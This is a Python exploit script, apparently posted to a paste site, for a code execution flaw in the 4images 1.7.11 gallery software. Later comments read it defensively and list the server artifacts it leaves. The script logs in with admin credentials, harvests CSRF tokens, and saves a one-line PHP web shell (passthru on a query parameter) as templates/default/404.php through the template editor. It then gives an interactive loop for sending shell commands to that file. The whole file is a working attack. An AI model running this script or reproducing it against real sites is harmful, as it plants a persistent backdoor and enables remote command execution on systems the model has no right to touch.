4images 1.7.11 Code Execution

3xploit3r Aug 12th, 2016 113 Never
#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
#
# Reviewer notes (defensive reading of this script):
# - Valid admin credentials are a precondition; nothing below bypasses
#   authentication, the script drives the admin template editor.
# - Server-side artifacts this produces: a POST to /admin/templates.php
#   with action=savetemplate, a new file templates/default/404.php, and
#   subsequent GET requests to that file carrying an "x" query parameter.
#   Those are the places to look when checking for misuse of the editor.
# - The script is Python 2 only (raw_input() in runShell).

import sys  # imported but not used anywhere below
import re
import argparse
import requests # requires requests lib

# Command-line interface: base URL of the site plus the admin credentials.
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

# Admin login form and the template editor that performs the file write.
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"

# File saved through the template editor, and its content: a one-line PHP
# script that hands the "x" query parameter to passthru(). The file name
# is what a defender should expect to find under templates/default/.
shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"
def login(requestSession, url, username, password):
    """Authenticate the session against the admin login form.

    url is the full login URL (base url + loginPath). Returns True when the
    response to the login POST no longer contains the login form.
    """
    # Fetch the login page and pull the hidden "__csrf" field out of the
    # HTML. The greedy ".*" may over-capture if more than one such
    # attribute sits on the same line; if no token is found re.search()
    # returns None and the .group() call raises AttributeError.
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    # Submit the login form with the harvested token; the requests.Session
    # keeps the resulting cookies for the later template-editor POST.
    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    # Success heuristic: the login form (which carries a "loginpassword"
    # input) is absent from the response. This is a string test, not a
    # status-code check.
    return "loginpassword" not in loginResult
  35.  
def upload(requestSession, url, fileName, fileContent):
    """Save fileContent as fileName through the admin template editor.

    url is the full editor URL (base url + fileManagerPath). Requires the
    session to be logged in already. Returns None and reports nothing.
    """
    # Same CSRF harvesting as in login(), this time on the editor page.
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    # "savetemplate" is the editor's save action. The caller later reads
    # templates/default/<fileName>, so this POST is assumed to write
    # fileContent there under the "default" template folder.
    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
    # The response body is stored in a misnamed variable and never checked,
    # so a rejected or failed save goes unnoticed at this point.
    loginResult = requestSession.post(url, data = postData).text
  43.  
def runShell(url):
    """Interactive loop against the planted file.

    Unlike login()/upload(), url here is the complete shell URL ending in
    "?x=" (see the call at the bottom of the file).
    """
    print("enter command, or enter exit to quit.")
    # raw_input() makes this Python 2 only.
    command = raw_input("$ ")
    # Any input containing the substring "exit" ends the loop. Each line is
    # appended to the URL verbatim (no URL encoding) and the response body
    # is printed as-is.
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
  50.  
# Main flow: log in, save the file through the editor, then loop on it.
# One Session object carries the admin cookies across both requests.
requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    # exit() is the site-module helper; sys.exit() is the conventional
    # form (sys is already imported at the top of the file).
    exit("ERROR: Incorrect username or password")

# upload() returns nothing, so a failed save is not detected here; it would
# only surface as errors when runShell fetches the file.
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

# Public path of the saved file under the "default" template folder;
# runShell appends each typed command to the "x" query parameter.
runShell(url + "/templates/default/" + shellFileName + "?x=")